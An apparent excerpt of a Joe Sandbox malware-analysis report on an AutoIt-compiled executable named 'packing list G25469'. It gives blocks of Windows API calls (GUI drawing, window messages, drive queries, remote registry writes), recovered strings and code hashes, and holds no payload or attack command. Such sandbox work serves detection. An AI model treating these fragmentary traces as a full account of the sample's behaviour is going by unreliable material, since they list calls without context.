                                                    • Part of subcall function 00B9D575: GetSysColorBrush.USER32(0000000F), ref: 00B9D5C8
                                                    • Part of subcall function 00B9D575: GetSysColor.USER32(0000000F), ref: 00B9D5D3
                                                    • Part of subcall function 00B9D575: GetSysColor.USER32(00000011), ref: 00B9D5F0
                                                    • Part of subcall function 00B9D575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9D5FE
                                                    • Part of subcall function 00B9D575: SelectObject.GDI32(?,00000000), ref: 00B9D60F
                                                    • Part of subcall function 00B9D575: SetBkColor.GDI32(?,00000000), ref: 00B9D618
                                                    • Part of subcall function 00B9D575: SelectObject.GDI32(?,?), ref: 00B9D625
                                                    • Part of subcall function 00B9D575: InflateRect.USER32(?,000000FF,000000FF), ref: 00B9D644
                                                    • Part of subcall function 00B9D575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9D65B
                                                    • Part of subcall function 00B9D575: GetWindowLongW.USER32(00000000,000000F0), ref: 00B9D670
                                                    • Part of subcall function 00B9D575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B9D698
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 3521893082-0
                                                  • Opcode ID: 58309ca351b8ca99abcb8aba8a4a2d96d42b9acf072082d7ea106446791eba74
                                                  • Instruction ID: 4a62e0811aa5f8cd7f2b978235db29df597a0f75c5c75b900624feb11698aa53
                                                  • Opcode Fuzzy Hash: 58309ca351b8ca99abcb8aba8a4a2d96d42b9acf072082d7ea106446791eba74
                                                  • Instruction Fuzzy Hash: 82915E71408301BFDB109F65DC48A6BBBE9FB85325F100B29F962A71E0EBB5D944CB52
                                                  APIs
                                                  • DestroyWindow.USER32 ref: 00B4B98B
                                                  • DeleteObject.GDI32(00000000), ref: 00B4B9CD
                                                  • DeleteObject.GDI32(00000000), ref: 00B4B9D8
                                                  • DestroyIcon.USER32(00000000), ref: 00B4B9E3
                                                  • DestroyWindow.USER32(00000000), ref: 00B4B9EE
                                                  • SendMessageW.USER32(?,00001308,?,00000000), ref: 00BAD2AA
                                                  • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00BAD2E3
                                                  • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 00BAD711
                                                    • Part of subcall function 00B4B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00B4B759,?,00000000,?,?,?,?,00B4B72B,00000000,?), ref: 00B4BA58
                                                  • SendMessageW.USER32 ref: 00BAD758
                                                  • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00BAD76F
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00BAD785
                                                  • ImageList_Destroy.COMCTL32(00000000), ref: 00BAD790
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                  • String ID: 0
                                                  • API String ID: 464785882-4108050209
                                                  • Opcode ID: 3420f530d9246e550417b3c392e1336255c49f3b779f7bd37dbff9aa65939b86
                                                  • Instruction ID: bbc0b6cc089725965e5c489a75471f316c77777de34282e4d0c08a01de372a17
                                                  • Opcode Fuzzy Hash: 3420f530d9246e550417b3c392e1336255c49f3b779f7bd37dbff9aa65939b86
                                                  • Instruction Fuzzy Hash: 0D128F70608201DFDB15CF18C884BA9B7F5FF1A304F1445A9EA8ACBA62CB31ED45DB51
                                                  APIs
                                                  • SetErrorMode.KERNEL32(00000001), ref: 00B7DBD6
                                                  • GetDriveTypeW.KERNEL32(?,00BCDC54,?,\\.\,00BCDC00), ref: 00B7DCC3
                                                  • SetErrorMode.KERNEL32(00000000,00BCDC54,?,\\.\,00BCDC00), ref: 00B7DE29
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: ErrorMode$DriveType
                                                  • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                  • API String ID: 2907320926-4222207086
                                                  • Opcode ID: 187a14bf520286cebe4dfd4c6ecbd25fc539c591523f61b4ed4c0ad534de53a0
                                                  • Instruction ID: ac2aa72f581ca29509cb355905b5a6ae907da2b078423bf9c83ffb0e9df948df
                                                  • Opcode Fuzzy Hash: 187a14bf520286cebe4dfd4c6ecbd25fc539c591523f61b4ed4c0ad534de53a0
                                                  • Instruction Fuzzy Hash: 7951A430208742AB8620DF25C9C5929B7F0FF94B80F24D9E9F47BAB2A1DB61D945D742
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: __wcsnicmp
                                                  • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                  • API String ID: 1038674560-86951937
                                                  • Opcode ID: 173e3cb2ecc16a56a4d9b7d12014454bfd3764f4216d9670bf3b06e47cc11491
                                                  • Instruction ID: 171bd5f2b8e1c7185491e224894bcf91e8b19ae257609d9ca34b7bf2358eb133
                                                  • Opcode Fuzzy Hash: 173e3cb2ecc16a56a4d9b7d12014454bfd3764f4216d9670bf3b06e47cc11491
                                                  • Instruction Fuzzy Hash: CA81D835644205BBCB25ABA8DC82FBB7BE8EF25700F1440F8F90676192EB61D945C791
                                                  APIs
                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013,?,?,?), ref: 00B9C788
                                                  • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00B9C83E
                                                  • SendMessageW.USER32(?,00001102,00000002,?), ref: 00B9C859
                                                  • SendMessageW.USER32(?,000000F1,?,00000000), ref: 00B9CB15
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window
                                                  • String ID: 0
                                                  • API String ID: 2326795674-4108050209
                                                  • Opcode ID: 74183633c6a97ce6f2846353d8701ba4f5a874bf6b2bed71015586133b13bf8c
                                                  • Instruction ID: b2205f3903097a0ccb75cfce95756a9d8981a9c963c2c406973dc9b7c845c989
                                                  • Opcode Fuzzy Hash: 74183633c6a97ce6f2846353d8701ba4f5a874bf6b2bed71015586133b13bf8c
                                                  • Instruction Fuzzy Hash: 7BF1D171104305AFEB218F28C885BAABFE4FF49354F144AB9F599D72A1D774C940CB91
                                                  APIs
                                                  • CharUpperBuffW.USER32(?,?,00BCDC00), ref: 00B96449
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: BuffCharUpper
                                                  • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                  • API String ID: 3964851224-45149045
                                                  • Opcode ID: 90a57863eee11f2919d6cd152a3ba6a6930ca8a0133fb1f435169f76c9abe6e5
                                                  • Instruction ID: 5f45e29dcdf1b09b67c86d5c7361246b54c1acf311abea1fdd9aba1d6766938f
                                                  • Opcode Fuzzy Hash: 90a57863eee11f2919d6cd152a3ba6a6930ca8a0133fb1f435169f76c9abe6e5
                                                  • Instruction Fuzzy Hash: 20C18D306042458BCF04EF54C591AAE77E5FF95344F1048E9F8969B3A3DB24EE4ADB82
                                                  APIs
                                                  • GetSysColor.USER32(00000012), ref: 00B9D5AE
                                                  • SetTextColor.GDI32(?,?), ref: 00B9D5B2
                                                  • GetSysColorBrush.USER32(0000000F), ref: 00B9D5C8
                                                  • GetSysColor.USER32(0000000F), ref: 00B9D5D3
                                                  • CreateSolidBrush.GDI32(?), ref: 00B9D5D8
                                                  • GetSysColor.USER32(00000011), ref: 00B9D5F0
                                                  • CreatePen.GDI32(00000000,00000001,00743C00), ref: 00B9D5FE
                                                  • SelectObject.GDI32(?,00000000), ref: 00B9D60F
                                                  • SetBkColor.GDI32(?,00000000), ref: 00B9D618
                                                  • SelectObject.GDI32(?,?), ref: 00B9D625
                                                  • InflateRect.USER32(?,000000FF,000000FF), ref: 00B9D644
                                                  • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00B9D65B
                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 00B9D670
                                                  • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00B9D698
                                                  • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 00B9D6BF
                                                  • InflateRect.USER32(?,000000FD,000000FD), ref: 00B9D6DD
                                                  • DrawFocusRect.USER32(?,?), ref: 00B9D6E8
                                                  • GetSysColor.USER32(00000011), ref: 00B9D6F6
                                                  • SetTextColor.GDI32(?,00000000), ref: 00B9D6FE
                                                  • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 00B9D712
                                                  • SelectObject.GDI32(?,00B9D2A5), ref: 00B9D729
                                                  • DeleteObject.GDI32(?), ref: 00B9D734
                                                  • SelectObject.GDI32(?,?), ref: 00B9D73A
                                                  • DeleteObject.GDI32(?), ref: 00B9D73F
                                                  • SetTextColor.GDI32(?,?), ref: 00B9D745
                                                  • SetBkColor.GDI32(?,?), ref: 00B9D74F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                  • String ID:
                                                  • API String ID: 1996641542-0
                                                  • Opcode ID: fc11f262708df35b5f3e66ca3d8be88211dc1db3e7d52ff4b36daf3bd03809f4
                                                  • Instruction ID: 04c85fd2ebdf00237902d77381d7d7e3b3920dd462abc5338233c19a94285a0c
                                                  • Opcode Fuzzy Hash: fc11f262708df35b5f3e66ca3d8be88211dc1db3e7d52ff4b36daf3bd03809f4
                                                  • Instruction Fuzzy Hash: C3514F71900208BFDF109FA9DC48EAE7BB9FF08320F114665F915AB2A1DBB59A40DF50
                                                  APIs
                                                  • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 00B9B7B0
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B9B7C1
                                                  • CharNextW.USER32(0000014E), ref: 00B9B7F0
                                                  • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 00B9B831
                                                  • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 00B9B847
                                                  • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00B9B858
                                                  • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 00B9B875
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B9B8C7
                                                  • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 00B9B8DD
                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 00B9B90E
                                                  • _memset.LIBCMT ref: 00B9B933
                                                  • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 00B9B97C
                                                  • _memset.LIBCMT ref: 00B9B9DB
                                                  • SendMessageW.USER32 ref: 00B9BA05
                                                  • SendMessageW.USER32(?,00001074,?,00000001), ref: 00B9BA5D
                                                  • SendMessageW.USER32(?,0000133D,?,?), ref: 00B9BB0A
                                                  • InvalidateRect.USER32(?,00000000,00000001), ref: 00B9BB2C
                                                  • GetMenuItemInfoW.USER32(?), ref: 00B9BB76
                                                  • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00B9BBA3
                                                  • DrawMenuBar.USER32(?), ref: 00B9BBB2
                                                  • SetWindowTextW.USER32(?,0000014E), ref: 00B9BBDA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                  • String ID: 0
                                                  • API String ID: 1073566785-4108050209
                                                  • Opcode ID: 9b17e247eb1c3c9e93b340cff3d53bdfca3c95ee4825e6fc0878a5e41acf6f24
                                                  • Instruction ID: e28b33f90dad440778715e57ef5f009a55e5972e28d4e53b8b5b13806f81308a
                                                  • Opcode Fuzzy Hash: 9b17e247eb1c3c9e93b340cff3d53bdfca3c95ee4825e6fc0878a5e41acf6f24
                                                  • Instruction Fuzzy Hash: B4E17175900218ABDF209FA5DD84EEE7BF8FF05714F1082A9F919AB190DB749A41CF60
                                                  APIs
                                                  • GetCursorPos.USER32(?), ref: 00B9778A
                                                  • GetDesktopWindow.USER32 ref: 00B9779F
                                                  • GetWindowRect.USER32(00000000), ref: 00B977A6
                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00B97808
                                                  • DestroyWindow.USER32(?), ref: 00B97834
                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00B9785D
                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B9787B
                                                  • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 00B978A1
                                                  • SendMessageW.USER32(?,00000421,?,?), ref: 00B978B6
                                                  • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 00B978C9
                                                  • IsWindowVisible.USER32(?), ref: 00B978E9
                                                  • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00B97904
                                                  • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00B97918
                                                  • GetWindowRect.USER32(?,?), ref: 00B97930
                                                  • MonitorFromPoint.USER32(?,?,00000002), ref: 00B97956
                                                  • GetMonitorInfoW.USER32 ref: 00B97970
                                                  • CopyRect.USER32(?,?), ref: 00B97987
                                                  • SendMessageW.USER32(?,00000412,00000000), ref: 00B979F2
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                  • String ID: ($0$tooltips_class32
                                                  • API String ID: 698492251-4156429822
                                                  • Opcode ID: 7030923d1d420cd9053e6ca856f91f42896512039e1acc434290834836f354b8
                                                  • Instruction ID: 66cabeb736e7cd21e7ef372f6d3f79d2acd2bdbd9ca5a9bfd19c5d51bbd7be52
                                                  • Opcode Fuzzy Hash: 7030923d1d420cd9053e6ca856f91f42896512039e1acc434290834836f354b8
                                                  • Instruction Fuzzy Hash: E1B1A371618301AFDB04DF69D988B5ABBE5FF88310F008A6DF5999B291DB74EC04CB91
                                                  APIs
                                                  • GetFileVersionInfoSizeW.VERSION(?,?), ref: 00B76CFB
                                                  • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 00B76D21
                                                  • _wcscpy.LIBCMT ref: 00B76D4F
                                                  • _wcscmp.LIBCMT ref: 00B76D5A
                                                  • _wcscat.LIBCMT ref: 00B76D70
                                                  • _wcsstr.LIBCMT ref: 00B76D7B
                                                  • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00B76D97
                                                  • _wcscat.LIBCMT ref: 00B76DE0
                                                  • _wcscat.LIBCMT ref: 00B76DE7
                                                  • _wcsncpy.LIBCMT ref: 00B76E12
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                  • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                  • API String ID: 699586101-1459072770
                                                  • Opcode ID: 6f60c0d41ccb44c08d3dcc2e14711237e7aeffa05d9ce2156dcfcd62078994f8
                                                  • Instruction ID: 59630650ccdf8b959503f3a824663dde76ba4557779b178871fd05ee0e802bb0
                                                  • Opcode Fuzzy Hash: 6f60c0d41ccb44c08d3dcc2e14711237e7aeffa05d9ce2156dcfcd62078994f8
                                                  • Instruction Fuzzy Hash: 4141E072A00201BBEB10BB65CC46FBF77ECDF45710F0440E9FD15A2192EF74AA05A6A1
                                                  APIs
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B4A939
                                                  • GetSystemMetrics.USER32(00000007), ref: 00B4A941
                                                  • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00B4A96C
                                                  • GetSystemMetrics.USER32(00000008), ref: 00B4A974
                                                  • GetSystemMetrics.USER32(00000004), ref: 00B4A999
                                                  • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00B4A9B6
                                                  • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 00B4A9C6
                                                  • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00B4A9F9
                                                  • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00B4AA0D
                                                  • GetClientRect.USER32(00000000,000000FF), ref: 00B4AA2B
                                                  • GetStockObject.GDI32(00000011), ref: 00B4AA47
                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00B4AA52
                                                    • Part of subcall function 00B4B63C: GetCursorPos.USER32(000000FF), ref: 00B4B64F
                                                    • Part of subcall function 00B4B63C: ScreenToClient.USER32(00000000,000000FF), ref: 00B4B66C
                                                    • Part of subcall function 00B4B63C: GetAsyncKeyState.USER32(00000001), ref: 00B4B691
                                                    • Part of subcall function 00B4B63C: GetAsyncKeyState.USER32(00000002), ref: 00B4B69F
                                                  • SetTimer.USER32(00000000,00000000,00000028,00B4AB87), ref: 00B4AA79
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                  • String ID: AutoIt v3 GUI
                                                  • API String ID: 1458621304-248962490
                                                  • Opcode ID: 653d7fff8d62b71452217bc44ee6e82616ce1ca02de81ce21b29df3f8ec2b4e9
                                                  • Instruction ID: 76785253dd1bb8e6362af73ba7a883a1dacc8e7fc96749b689cb065d28f074bd
                                                  • Opcode Fuzzy Hash: 653d7fff8d62b71452217bc44ee6e82616ce1ca02de81ce21b29df3f8ec2b4e9
                                                  • Instruction Fuzzy Hash: 5AB15871A4020AAFDB14DFA8CC85BAE7BE4EB08324F114669FA16E7290DB74D940DB51
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
                                                  • Associated: 00000000.00000002.2106179367.0000000000B30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BBD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106264566.0000000000BDE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106312192.0000000000BEA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2106329890.0000000000BF4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_b30000_packing list G25469.jbxd
                                                  Similarity
                                                  • API ID: Window$Foreground
                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                  • API String ID: 62970417-1919597938
                                                  • Opcode ID: 19bd57e4ba9dea036784188024ed75abc8d21dd41c23b4e9c2520de84107767b
                                                  • Instruction ID: 799942c683f2e2b43d9531e0cd3dbc4534eb1c86459bb7582d9d5d9743560804
                                                  • Opcode Fuzzy Hash: 19bd57e4ba9dea036784188024ed75abc8d21dd41c23b4e9c2520de84107767b
                                                  • Instruction Fuzzy Hash: E2D1E730508342AFCB04EF28C481AAABBF4FF55344F104ADDF456575A2DB70E99ADB91
                                                  APIs
                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B93735
                                                  • RegCreateKeyExW.ADVAPI32(?,?,00000000,00BCDC00,00000000,?,00000000,?,?), ref: 00B937A3
                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 00B937EB
                                                  • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 00B93874
                                                  • RegCloseKey.ADVAPI32(?), ref: 00B93B94
                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00B93BA1
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2106201149.0000000000B31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B30000, based on PE: true
